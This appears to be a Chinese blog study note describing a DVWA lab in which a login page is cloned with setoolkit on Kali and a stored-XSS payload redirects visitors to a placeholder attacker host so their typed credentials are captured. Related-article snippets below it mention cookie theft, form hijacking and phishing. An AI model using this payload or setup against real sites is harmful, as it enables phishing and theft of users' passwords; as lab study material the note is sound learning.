利用xss窃取信息学习笔记

最新推荐文章于 2023-09-10 16:34:22 发布
最新推荐文章于 2023-09-10 16:34:22 发布
阅读量173 收藏 1
点赞数
分类专栏: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50597969/article/details/115758816
版权

利用xss窃取信息学习笔记

原理

克隆网站登陆页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登陆页面,用户输入登陆,账号和密码被存储。
在这里插入图片描述

setoolkit工具克隆网站

kali终端输入setoolkit
接着输入y
出现👇

在这里插入图片描述
接着依次选择1,2,3,2

在这里插入图片描述
接着直接回车
在这里插入图片描述
输入目标url即可
在这里插入图片描述
然后访问那个url,转到dvwa的登陆界面

存储xss跳转克隆网站

将👇payload存储到存储型xss中

//xss payload
<script>window.location="http://xxx.xxx.xxx.xxx/"</script>//对应克隆站点的url

存储之后点击留言板内容会自动跳转到一个登陆界面

在这里插入图片描述

查看账号和密码

之后转到kali终端可以看到相应信息

在这里插入图片描述

T0mrvvi1b3t
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用XSS漏洞读取任意文件,get新思路!
weixin_54787877的博客
03-15 3110
简述 网站是一个在线填写报表功能,填写好报表之后可以生成报表的pdf文件 思路讲解 1. 发现解析xss 首先随便输入一个payload,"><S>aaa 。发现输入的标签被解析了 2. 用iframe标签加载,但是没有内容 使用iframe标签,但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20 ...
Xss学习研究平台源码.zip
05-12
Xss学习研究平台源码.zip
WEB攻防-XSS跨站&Cookie盗取&表单劫持&网络钓鱼&溯源分析&项目平台框架
siu~
09-10 487
1、XSS跨站-攻击利用-凭据盗取 2、XSS跨站-攻击利用-数据提交 3、XSS跨站-攻击利用-网络钓鱼 4、XSS跨站-攻击利用-溯源综合
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
m0_65336233的博客
10-13 1114
WEB攻防-通用漏洞&XSS跨站-表单劫持&钓鱼捆绑
XSS盗取用户信息实验(详细)及xss之旅闯关
m0re's blog
05-29 1178
本文目录前言小实验实验环境实验实验过程xss之旅 前言 近段时间学习xss,进行了比较详细的了解,也学了一个小实验,感觉挺有意思,记录下来。然后,后面就是xss之旅的闯关。 小实验 实验环境 DVWA、kali linux、物理机或一台windows系统的虚拟机。 实验 实验原理: 克隆网站登录页面,利用存储xss设置跳转代码,如果用户访问即跳转到克隆网站的登录页面,用户输入登录,账号和密码被存储...
XSS漏洞利用/setookit制作克隆网站/看完必会
ChenD的学习笔记
10-11 665
kali setookie克隆网页,XSS漏洞跳转到克隆网页,获取用户名与密码
XSS的高级利用:盗取用户Cookie
Zeker62的博客
08-13 1106
XSS不仅仅弹出一个alert就行了,更多的是和其他玩意组合 高级的利用有: 盗取用户Cookie 修改网页内容 网站挂马 利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介: Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中,或者是从客户端的硬盘或者内存读取数据的一种技术 因为HTTP协议是无状态的,Web服务器没办法区分请求是否来源于同一个浏览器,因此,web服务器需要额外的数据去维持会话,而Cookie正是这种维持会话的数
xss跨站脚本攻击
weixin_42374938的博客
08-13 209
xss是一种在客户端利用JavaScript脚本获取敏感信息的攻击行为。
XSS注入-盗取用户信息和内容篡改
qq_25899635的博客
05-28 1878
cookie介绍   Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie是由Web服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。   目前有些Cookie是临时的,有些则是持续的。临时的Cookie只在浏览器上保存一段时间,一但超过规定时间,该Cookie就会被系统清除。   服务器可以利用Cookie包含信息的任意性来筛选并经...
Webgoat学习笔记.zip
03-12
Webgoat学习笔记
Vue计算属性的学习笔记
12-04
本文为大家分享了Vue计算属性的学习笔记,供大家参考,具体内容如下 ①模板内的表达式实际上只用于简单的运算,对于复杂逻辑,使用计算机属性。 ②基础例子: <div xss=removed> <p>Original message:"{{message...
基于机器学习建模的 XSS 攻击防范检测.docx
05-21
基于机器学习建模的 XSS 攻击防范检测.docx
xss-vuln学习通关总结
08-24
个人总结类文档。
WEB漏洞篇——跨站脚本攻击(XSS
m0_56634355的博客
06-05 4599
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
xss和sql注入原理学习
weixin_30875157的博客
12-12 312
8.4Web跨站脚本攻击 8.4.1 跨站脚本攻击的原理(1) 跨站脚本在英文中称为Cross-Site Scripting,缩写为CSS。但是,由于层叠样式表 (Cascading Style Sheets)的缩写也为CSS,为不与其混淆,特将跨站脚本缩写为XSS。 跨站脚本,顾名思义,就是恶意攻击者利用网站漏洞往Web页面里插入恶意代码,一般需要以下几个条件: 客户端访问...
xss 表单劫持(from通用明文记录)
weixin_34258078的博客
04-10 1175
大家都知道,在提交form表单时会调用onsubmit方法,既然调用了onsubmit,说明表单中该填的项肯定都已经填好了,这时,我们通过修改onsubmit方法,便可以获取表单中的信息.xss.js:varf=document.forms['from1']; if(f==undefined) { f=document.getElementById('');...
xss攻击的手段
tumi
04-28 264
xss常用的攻击手段:1、盗用cookie获取敏感信息2、破坏正常页面结构3、利用DDoS(Distributed Denial of Service,分布式拒绝服务)攻击,目前最为强大也是最难防御的攻击之一...
xss跨站攻击详讲 | 如何利用xss拿下一个站?
热门推荐
向阳-Y.的博客
11-13 1万+
1.初识xxs跨站漏洞: xss能干什么? 利用xss获取对方后台地址、cookie信息,得到cookie和后台地址后,能通过相关工具(比如postman)进行后台登录: 其他补充: cookie :一般用于小中型网站,一般存储在自己电脑上,存活时间较长 session:采用会话模式,一般用于大型网站,一存储在服务器上,存活时间较短 2.xss的类型 2.1反射型 当在网页插入下列xss代码后,会立即回馈到屏幕,但这条xss代码并不会一直存储到该网站上 <script>alert(1)&
node-v0.8.10-sunos-x64.tar.gz
最新发布
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
存储型xss dvwa窃取cookie
06-06
存储型XSS攻击是一种利用网站漏洞,将恶意脚本存储在服务器上,当其他用户访问该网站时,恶意脚本会被执行,从而实现攻击者的目的。在DVWA中,攻击者可以通过在留言板或评论区等存储用户输入的地方,插入恶意脚本,从而窃取其他用户的cookie信息。这种攻击方式对网站的安全性造成了很大的威胁,需要网站管理员及时修复漏洞,加强网站的安全性防护。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值